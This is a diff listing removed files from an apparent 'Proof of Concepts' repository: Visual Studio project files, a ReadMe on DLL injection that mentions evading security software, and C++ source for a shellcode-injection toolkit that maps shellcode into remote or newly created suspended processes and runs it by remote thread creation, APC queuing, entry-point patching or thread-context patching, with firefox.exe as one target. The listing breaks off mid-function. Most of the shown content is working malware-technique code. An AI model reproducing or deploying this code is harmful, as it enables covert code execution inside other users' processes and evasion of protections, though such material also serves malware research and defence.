<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="CreateRemoteThread.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CreateRemoteThread.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CreateRemoteThread.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

47
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/CreateRemoteThread.vcxproj.filters
View File

@ -1,47 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="CreateRemoteThread.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="CreateRemoteThread.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CreateRemoteThread.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

4
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/ReadMe.txt
View File

@ -1,4 +0,0 @@
32 bit process Inject The dll to 32 bit process
64 bit process Inject The dll to 64 bit process
sometimes you maybe fail to inject because cann't openprocess successful
and many safe software will protect it avoiding you to inject

17
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/Resource.h
View File

@ -1,17 +0,0 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by CreateRemoteThread.rc
//
#define IDS_APP_TITLE 103
// 新对象的下一组默认值
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif

8
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/stdafx.cpp
View File

@ -1,8 +0,0 @@
// stdafx.cpp : 只包括标准包含文件的源文件
// CreateRemoteThread.pch 将作为预编译头
// stdafx.obj 将包含预编译类型信息
#include "stdafx.h"
// TODO: 在 STDAFX.H 中
// 引用任何所需的附加头文件,而不是在此文件中引用

32
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/stdafx.h
View File

@ -1,32 +0,0 @@
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头文件中排除极少使用的信息
#endif
#include <afx.h>
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <iostream>
// TODO: 在此处引用程序需要的其他头文件

8
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/targetver.h
View File

@ -1,8 +0,0 @@
#pragma once
// 包括 SDKDDKVer.h 将定义可用的最高版本的 Windows 平台。
// 如果要为以前的 Windows 平台生成应用程序,请包括 WinSDKVer.h并将
// WIN32_WINNT 宏设置为要支持的平台,然后再包括 SDKDDKVer.h。
#include <SDKDDKVer.h>

7
Win32/Proof of Concepts/CreateRemoteThreadInjection/ReadMe.txt
View File

@ -1,7 +0,0 @@
32 bit process Inject The dll to 32 bit process
64 bit process Inject The dll to 64 bit process
sometimes you maybe fail to inject because cann't openprocess successful
and many safe software will protect it avoiding you to inject
support more OS.

13
Win32/Proof of Concepts/ExtraWindowInject/README.md
View File

@ -1,13 +0,0 @@
# inject_shellcode
Small compendium of injection techniques commonly used in malware demonstrated on metasploit-generated shellcode<br/>
Various objects of injection:<br/>
+ existing process (found by name)
+ newly created process
Demonstrated methods:<br/>
+ Running shellcode in a new thread
+ Adding shellcode into existing thread (using NtQueueApcThread)
+ Patching Entry Point of the process
+ Patching context of the process
+ Injecting into Tray Window (using SetWindowLong)

34
Win32/Proof of Concepts/ExtraWindowInject/src/CMakeLists.txt
View File

@ -1,34 +0,0 @@
cmake_minimum_required (VERSION 2.8)
project (Injections)
add_definitions(-DUNICODE -D_UNICODE)
set (srcs
main.cpp
window_long_inject.cpp
sysutil.cpp
pe_hdrs_helper.cpp
)
set (hdrs
main.h
ntddk.h
ntdll_undoc.h
kernel32_undoc.h
map_buffer_into_process.h
target_util.h
payload.h
createproc.h
add_thread.h
add_apc.h
patch_ep.h
patch_context.h
window_long_inject.h
enumproc.h
sysutil.h
pe_hdrs_helper.h
)
add_executable (Injections ${hdrs} ${srcs})
INSTALL( TARGETS ${PROJECT_NAME} DESTINATION ${CMAKE_INSTALL_PREFIX} COMPONENT ${PROJECT_NAME} )

21
Win32/Proof of Concepts/ExtraWindowInject/src/add_apc.h
View File

@ -1,21 +0,0 @@
#pragma once
#include <stdio.h>
#include "ntdll_undoc.h"
bool add_shellcode_to_apc(HANDLE hThread, LPVOID remote_shellcode_ptr)
{
#if defined(_WIN64)
printf("[ERROR] 64bit version of this method is not implemented!\n");
return false;
#else
printf("Adding shellcode to the queue\n");
NTSTATUS status = NULL;
if ((status = NtQueueApcThread(hThread, remote_shellcode_ptr, 0, 0, 0)) != STATUS_SUCCESS)
{
printf("[ERROR] NtQueueApcThread failed, status : %x\n", status);
return false;
}
return true;
#endif
}

89
Win32/Proof of Concepts/ExtraWindowInject/src/add_thread.h
View File

@ -1,89 +0,0 @@
#pragma once
#include <stdio.h>
#include "ntddk.h"
#include "ntdll_undoc.h"
typedef enum {
usingRandomMethod,
usingCreateRemoteThread,
usingZwCreateThreadEx,
usingRtlCreateUserThread,
CREATION_METHODS_SIZE
} THREAD_CREATION_METHOD;
bool run_shellcode_in_new_thread1(HANDLE hProcess, LPVOID remote_shellcode_ptr)
{
NTSTATUS status = NULL;
//create a new thread for the injected code:
LPTHREAD_START_ROUTINE routine = (LPTHREAD_START_ROUTINE) remote_shellcode_ptr;
DWORD threadId = NULL;
HANDLE hMyThread = NULL;
if ((hMyThread = CreateRemoteThread(hProcess, NULL, NULL, routine, NULL, CREATE_SUSPENDED, &threadId)) == NULL) {
printf("[ERROR] CreateRemoteThread failed, status : %x\n", GetLastError());
return false;
}
printf("Created Thread, id = %x\n", threadId);
printf("Resuming added thread...\n");
ResumeThread(hMyThread); //injected code
return true;
}
bool run_shellcode_in_new_thread2(HANDLE hProcess, LPVOID remote_shellcode_ptr)
{
NTSTATUS status = NULL;
HANDLE hMyThread = NULL;
//create a new thread for the injected code:
if ((status = ZwCreateThreadEx(&hMyThread, 0x1FFFFF, NULL, hProcess, remote_shellcode_ptr, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateThreadEx failed, status : %x\n", status);
return false;
}
printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
printf("Resuming added thread...\n");
ResumeThread(hMyThread); //injected code
return true;
}
bool run_shellcode_in_new_thread3(HANDLE hProcess, LPVOID remote_shellcode_ptr)
{
NTSTATUS status = NULL;
HANDLE hMyThread = NULL;
CLIENT_ID cid;
//create a new thread for the injected code:
if ((status = RtlCreateUserThread(hProcess, NULL, true, 0, 0, 0, remote_shellcode_ptr, NULL, &hMyThread, &cid)) != STATUS_SUCCESS)
{
printf("[ERROR] RtlCreateUserThread failed, status : %x\n", status);
return false;
}
printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
printf("Resuming added thread...\n");
ResumeThread(hMyThread); //injected code
return true;
}
//---
bool run_shellcode_in_new_thread(HANDLE hProcess, LPVOID remote_shellcode_ptr, DWORD method)
{
bool isSuccess = false;
DWORD max = CREATION_METHODS_SIZE - 1;
DWORD random = (GetTickCount() * 1000) % max + 1;
if (method > max || method <= usingRandomMethod) method = random;
printf("Injecting by method, id = %x\n", method);
switch (method) {
case usingCreateRemoteThread:
isSuccess = run_shellcode_in_new_thread1(hProcess, remote_shellcode_ptr);
break;
case usingZwCreateThreadEx:
isSuccess = run_shellcode_in_new_thread2(hProcess, remote_shellcode_ptr);
break;
case usingRtlCreateUserThread:
isSuccess = run_shellcode_in_new_thread3(hProcess, remote_shellcode_ptr);
break;
default:
return false;
}
return isSuccess;
}

59
Win32/Proof of Concepts/ExtraWindowInject/src/createproc.h
View File

@ -1,59 +0,0 @@
#pragma once
#include "kernel32_undoc.h"
bool create_new_process1(PROCESS_INFORMATION &pi, LPWSTR cmdLine, LPWSTR startDir = NULL)
{
STARTUPINFO si;
memset(&si, 0, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
if (!CreateProcess(
NULL,
cmdLine,
NULL, //lpProcessAttributes
NULL, //lpThreadAttributes
FALSE, //bInheritHandles
DETACHED_PROCESS|CREATE_SUSPENDED|CREATE_NO_WINDOW, //dwCreationFlags
NULL, //lpEnvironment
startDir, //lpCurrentDirectory
&si, //lpStartupInfo
&pi //lpProcessInformation
))
{
printf("[ERROR] CreateProcess failed, Error = %x\n", GetLastError());
return false;
}
return true;
}
bool create_new_process2(PROCESS_INFORMATION &pi, LPWSTR cmdLine, LPWSTR startDir = NULL)
{
STARTUPINFO si;
memset(&si, 0, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
HANDLE hToken = NULL;
HANDLE hNewToken = NULL;
if (!CreateProcessInternalW (hToken,
NULL, //lpApplicationName
(LPWSTR) cmdLine, //lpCommandLine
NULL, //lpProcessAttributes
NULL, //lpThreadAttributes
FALSE, //bInheritHandles
CREATE_SUSPENDED|DETACHED_PROCESS|CREATE_NO_WINDOW, //dwCreationFlags
NULL, //lpEnvironment
startDir, //lpCurrentDirectory
&si, //lpStartupInfo
&pi, //lpProcessInformation
&hNewToken
))
{
printf("[ERROR] CreateProcessInternalW failed, Error = %x\n", GetLastError());
return false;
}
return true;
}

55
Win32/Proof of Concepts/ExtraWindowInject/src/enumproc.h
View File

@ -1,55 +0,0 @@
#pragma once
#include <psapi.h>
bool get_process_name(IN HANDLE hProcess, OUT LPWSTR nameBuf, IN SIZE_T nameMax)
{
HMODULE hMod;
DWORD cbNeeded;
if (EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded)) {
GetModuleBaseName( hProcess, hMod, nameBuf, nameMax );
return true;
}
return false;
}
bool is_searched_process( DWORD processID, LPWSTR searchedName)
{
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID );
if (hProcess == NULL) return false;
WCHAR szProcessName[MAX_PATH];
if (get_process_name(hProcess, szProcessName, MAX_PATH)) {
if (wcsstr(szProcessName, searchedName) != NULL) {
printf( "%S (PID: %u)\n", szProcessName, processID );
CloseHandle(hProcess);
return true;
}
}
CloseHandle(hProcess);
return false;
}
HANDLE find_running_process(LPWSTR searchedName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded)) {
return NULL;
}
//calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
//search handle to the process of defined name
for ( i = 0; i < cProcesses; i++ ) {
if( aProcesses[i] != 0 ) {
if (is_searched_process(aProcesses[i], searchedName)) {
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, aProcesses[i]);
return hProcess;
}
}
}
return NULL;
}

32
Win32/Proof of Concepts/ExtraWindowInject/src/kernel32_undoc.h
View File

@ -1,32 +0,0 @@
#pragma once
#include <Windows.h>
//don't forget to load functiond before use:
//load_kernel32_functions();
//
BOOL
(WINAPI *CreateProcessInternalW)(HANDLE hToken,
LPCWSTR lpApplicationName,
LPWSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation,
PHANDLE hNewToken
);
BOOL load_kernel32_functions()
{
HMODULE hKernel32 = GetModuleHandleA("kernel32");
CreateProcessInternalW = (BOOL (WINAPI *)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES,BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION, PHANDLE)) GetProcAddress(hKernel32,"CreateProcessInternalW");
if (CreateProcessInternalW == NULL) return FALSE;
return TRUE;
}

127
Win32/Proof of Concepts/ExtraWindowInject/src/main.cpp
View File

@ -1,127 +0,0 @@
#include <Windows.h>
#include <iostream>
#include "main.h"
#include "createproc.h"
#include "enumproc.h"
#include "payload.h"
#include "map_buffer_into_process.h"
#include "sysutil.h"
typedef enum {
ADD_THREAD,
ADD_APC,
PATCH_EP,
PATCH_CONTEXT
} INJECTION_POINT;
typedef enum {
EXISTING_PROC,
NEW_PROC,
TRAY_WINDOW
} TARGET_TYPE;
using namespace std;
bool inject_in_new_process(INJECTION_POINT mode)
{
//get target path
WCHAR cmdLine[MAX_PATH];
get_calc_path(cmdLine, MAX_PATH);
WCHAR startDir[MAX_PATH];
if (!get_dir(cmdLine, startDir)) {
GetSystemDirectory(startDir, MAX_PATH);
}
printf("Target: %S\n", cmdLine);
//create suspended process
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(PROCESS_INFORMATION));
if (create_new_process2(pi, cmdLine, startDir) == false) {
return false;
}
LPVOID remote_shellcode_ptr = map_buffer_into_process1(pi.hProcess, g_Shellcode, sizeof(g_Shellcode), PAGE_EXECUTE_READWRITE);
bool result = false;
switch (mode) {
case ADD_THREAD:
result = run_shellcode_in_new_thread(pi.hProcess, remote_shellcode_ptr, THREAD_CREATION_METHOD::usingRandomMethod);
// not neccessery to resume the main thread
break;
case ADD_APC:
result = add_shellcode_to_apc(pi.hThread, remote_shellcode_ptr);
ResumeThread(pi.hThread); //resume the main thread
break;
case PATCH_EP:
result = paste_shellcode_at_ep(pi.hProcess, remote_shellcode_ptr, pi.hThread);
ResumeThread(pi.hThread); //resume the main thread
break;
case PATCH_CONTEXT:
result = patch_context(pi.hThread, remote_shellcode_ptr);
ResumeThread(pi.hThread); //resume the main thread
break;
}
//close handles
ZwClose(pi.hThread);
ZwClose(pi.hProcess);
return result;
}
bool inject_in_existing_process()
{
HANDLE hProcess = find_running_process(L"firefox.exe");
LPVOID remote_shellcode_ptr = map_buffer_into_process1(hProcess, g_Shellcode, sizeof(g_Shellcode), PAGE_EXECUTE_READWRITE);
if (remote_shellcode_ptr == NULL) {
return false;
}
return run_shellcode_in_new_thread(hProcess, remote_shellcode_ptr, THREAD_CREATION_METHOD::usingRandomMethod);
}
int main()
{
if (load_ntdll_functions() == FALSE) {
printf("Failed to load NTDLL function\n");
return (-1);
}
if (load_kernel32_functions() == FALSE) {
printf("Failed to load KERNEL32 function\n");
return (-1);
}
// compatibility checks:
if (!is_system32b()) {
printf("[WARNING] Your ystem is NOT 32 bit! Some of the methods may not work.\n");
}
if (!is_compiled_32b()) {
printf("[WARNING] It is recommended to compile the loader as a 32 bit application!\n");
}
// choose the method:
TARGET_TYPE targetType = TARGET_TYPE::NEW_PROC;
switch (targetType) {
case TARGET_TYPE::TRAY_WINDOW:
if (!is_system32b()) {
printf("[ERROR] Not supported! Your system is NOT 32 bit!\n");
break;
}
// this injection is more fragile, use shellcode that makes no assumptions about the context
if (inject_into_tray(g_Shellcode, sizeof(g_Shellcode))) {
printf("[SUCCESS] Code injected into tray window!\n");
break;
}
case TARGET_TYPE::EXISTING_PROC:
if (inject_in_existing_process()) {
printf("[SUCCESS] Code injected into existing process!\n");
break;
}
case TARGET_TYPE::NEW_PROC:
if (inject_in_new_process(INJECTION_POINT::PATCH_EP)) {
printf("[SUCCESS] Code injected into a new process!\n");
break;
}
}
system("pause");
return 0;
}

13
Win32/Proof of Concepts/ExtraWindowInject/src/main.h
View File

@ -1,13 +0,0 @@
#pragma once
#include "ntdll_undoc.h"
#include "kernel32_undoc.h"
#include "target_util.h"
//injection types:
#include "add_thread.h"
#include "add_apc.h"
#include "patch_ep.h"
#include "patch_context.h"
#include "window_long_inject.h"

67
Win32/Proof of Concepts/ExtraWindowInject/src/map_buffer_into_process.h
View File

@ -1,67 +0,0 @@
#pragma once
#include <stdio.h> // for printf
#include <wchar.h>
#include "ntddk.h"
//set of alternative functions doing the same by a different way
PVOID map_buffer_into_process1(HANDLE hProcess, LPBYTE buffer, SIZE_T buffer_size, DWORD protect = PAGE_EXECUTE_READWRITE)
{
HANDLE hSection = NULL;
OBJECT_ATTRIBUTES hAttributes;
memset(&hAttributes, 0, sizeof(OBJECT_ATTRIBUTES));
LARGE_INTEGER maxSize;
maxSize.HighPart = 0;
maxSize.LowPart = static_cast<DWORD>(buffer_size);
NTSTATUS status = NULL;
if ((status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &maxSize, protect, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateSection failed, status : %x\n", status);
return NULL;
}
PVOID sectionBaseAddress = NULL;
ULONG viewSize = 0;
SECTION_INHERIT inheritDisposition = ViewShare; //VIEW_SHARE
// map the section in context of current process:
if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(), &sectionBaseAddress, NULL, NULL, NULL, &viewSize, inheritDisposition, NULL, protect)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
printf("Section BaseAddress: %p\n", sectionBaseAddress);
memcpy (sectionBaseAddress, buffer, buffer_size);
printf("Buffer copied!\n");
//map the new section into context of opened process
PVOID sectionBaseAddress2 = NULL;
if ((status = NtMapViewOfSection(hSection, hProcess, &sectionBaseAddress2, NULL, NULL, NULL, &viewSize, ViewShare, NULL, protect)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
//unmap from the context of current process
ZwUnmapViewOfSection(GetCurrentProcess(), sectionBaseAddress);
ZwClose(hSection);
printf("Section mapped at address: %p\n", sectionBaseAddress2);
return sectionBaseAddress2;
}
LPVOID map_buffer_into_process2(HANDLE hProcess, LPBYTE buffer, SIZE_T buffer_size, DWORD protect = PAGE_EXECUTE_READWRITE)
{
LPVOID remoteAddress = VirtualAllocEx(hProcess, NULL, buffer_size, MEM_COMMIT | MEM_RESERVE, protect);
if (remoteAddress == NULL) {
printf("Could not allocate memory in the remote process\n");
return NULL;
}
if (!WriteProcessMemory(hProcess, remoteAddress, buffer, buffer_size, NULL)) {
VirtualFreeEx(hProcess,remoteAddress, buffer_size, MEM_FREE);
return NULL;
}
return remoteAddress;
}

4292
Win32/Proof of Concepts/ExtraWindowInject/src/ntddk.h
View File

File diff suppressed because it is too large Load Diff

72
Win32/Proof of Concepts/ExtraWindowInject/src/ntdll_undoc.h
View File

@ -1,72 +0,0 @@
#pragma once
#include <Windows.h>
#include "ntddk.h"
//undocumented functions from ntdll.dll
//
//don't forget to load functions before use:
//load_ntdll_functions();
NTSTATUS (NTAPI *NtQueueApcThread)(
IN HANDLE ThreadHandle,
IN PVOID ApcRoutine,
IN PVOID ApcRoutineContext OPTIONAL,
IN PVOID ApcStatusBlock OPTIONAL,
IN ULONG ApcReserved OPTIONAL
);
NTSTATUS (NTAPI *ZwSetInformationThread) (
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength
);
NTSTATUS (NTAPI *ZwCreateThreadEx) (
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN ULONG_PTR ZeroBits,
IN SIZE_T StackSize OPTIONAL,
IN SIZE_T MaximumStackSize OPTIONAL,
IN PVOID AttributeList OPTIONAL
);
NTSTATUS (NTAPI *RtlCreateUserThread) (
IN HANDLE ProcessHandle,
IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
IN BOOLEAN CreateSuspended,
IN ULONG StackZeroBits,
IN OUT PULONG StackReserved,
IN OUT PULONG StackCommit,
IN PVOID StartAddress,
IN PVOID StartParameter OPTIONAL,
OUT PHANDLE ThreadHandle,
OUT PCLIENT_ID ClientID
);
BOOL load_ntdll_functions()
{
HMODULE hNtdll = GetModuleHandleA("ntdll");
if (hNtdll == NULL) return FALSE;
NtQueueApcThread = (NTSTATUS (NTAPI *)(HANDLE, PVOID, PVOID, PVOID, ULONG)) GetProcAddress(hNtdll,"NtQueueApcThread");
if (NtQueueApcThread == NULL) return FALSE;
ZwSetInformationThread = (NTSTATUS (NTAPI *)(HANDLE, THREADINFOCLASS, PVOID, ULONG)) GetProcAddress(hNtdll,"ZwSetInformationThread");
if (ZwSetInformationThread == NULL) return FALSE;
ZwCreateThreadEx = (NTSTATUS (NTAPI *) (PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID)) GetProcAddress(hNtdll,"ZwCreateThreadEx");
if (ZwCreateThreadEx == NULL) return FALSE;
RtlCreateUserThread = (NTSTATUS (NTAPI *) (HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN,ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID)) GetProcAddress(hNtdll,"RtlCreateUserThread");
if (RtlCreateUserThread == NULL) return FALSE;
return TRUE;
}

39
Win32/Proof of Concepts/ExtraWindowInject/src/patch_context.h
View File

@ -1,39 +0,0 @@
#pragma once
#include <Windows.h>
//32-bit version
bool patch_context(HANDLE hThread, LPVOID remote_shellcode_ptr)
{
//get initial context of the target:
BOOL res = FALSE;
#if defined(_WIN64)
WOW64_CONTEXT context;
memset(&context, 0, sizeof(WOW64_CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
res = Wow64GetThreadContext(hThread, &context);
#else
CONTEXT context;
memset(&context, 0, sizeof(CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
res = GetThreadContext(hThread, &context);
#endif
if (res == FALSE) {
return false;
}
//if the process was created as suspended and didn't run yet, EAX holds it's entry point:
context.Eax = (DWORD) remote_shellcode_ptr;
#if defined(_WIN64)
Wow64SetThreadContext(hThread, &context);
#else
res = SetThreadContext(hThread, &context);
#endif
if (res == FALSE) {
return false;
}
printf("patched context -> EAX = %x\n", context.Eax);
return true;
}

140
Win32/Proof of Concepts/ExtraWindowInject/src/patch_ep.h
View File

@ -1,140 +0,0 @@
#pragma once
#include <stdio.h>
#include "ntddk.h"
#include "pe_hdrs_helper.h"
#define PAGE_SIZE 0x1000
// Get image base by a method #1:
LPCVOID getTargetImageBase1(HANDLE hProcess)
{
PROCESS_BASIC_INFORMATION pbi;
memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION));
if (NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0)
{
printf("[ERROR] NtQueryInformationProcess failed\n");
return NULL;
}
printf("PEB = %p\n", (LPVOID)pbi.PebBaseAddress);
LPCVOID ImageBase = 0;
SIZE_T read_bytes = 0;
if (!ReadProcessMemory(hProcess, (BYTE*)pbi.PebBaseAddress + 8, &ImageBase, sizeof(ImageBase), &read_bytes)
|| read_bytes != sizeof(ImageBase)
)
{
printf("[ERROR] Cannot read from PEB - incompatibile target!\n");
return NULL;
}
return ImageBase;
}
// Get image base by a method #2:
// WARNING: this method of getting Image Base works only if
// the process has been created as a SUSPENDED and didn't run yet
// - it uses specific values of the registers, that are set only in this case.
LPCVOID getTargetImageBase2(HANDLE hProcess, HANDLE hThread)
{
//get initial context of the target:
#if defined(_WIN64)
WOW64_CONTEXT context;
memset(&context, 0, sizeof(WOW64_CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
Wow64GetThreadContext(hThread, &context);
#else
CONTEXT context;
memset(&context, 0, sizeof(CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
GetThreadContext(hThread, &context);
#endif
//get image base of the target:
DWORD PEB_addr = context.Ebx;
const SIZE_T kPtrSize = sizeof(DWORD); //for 32 bit
DWORD targetImageBase = 0; //for 32 bit
printf("PEB = %x\n", PEB_addr);
if (!ReadProcessMemory(hProcess, LPVOID(PEB_addr + 8), &targetImageBase, kPtrSize, NULL)) {
printf("[ERROR] Cannot read from PEB - incompatibile target!\n");
return false;
}
return (LPCVOID)((ULONGLONG)targetImageBase);
}
bool paste_shellcode_at_ep(HANDLE hProcess, LPVOID remote_shellcode_ptr, HANDLE hThread=NULL)
{
LPCVOID ImageBase = NULL; //target ImageBase
if (hThread != NULL) {
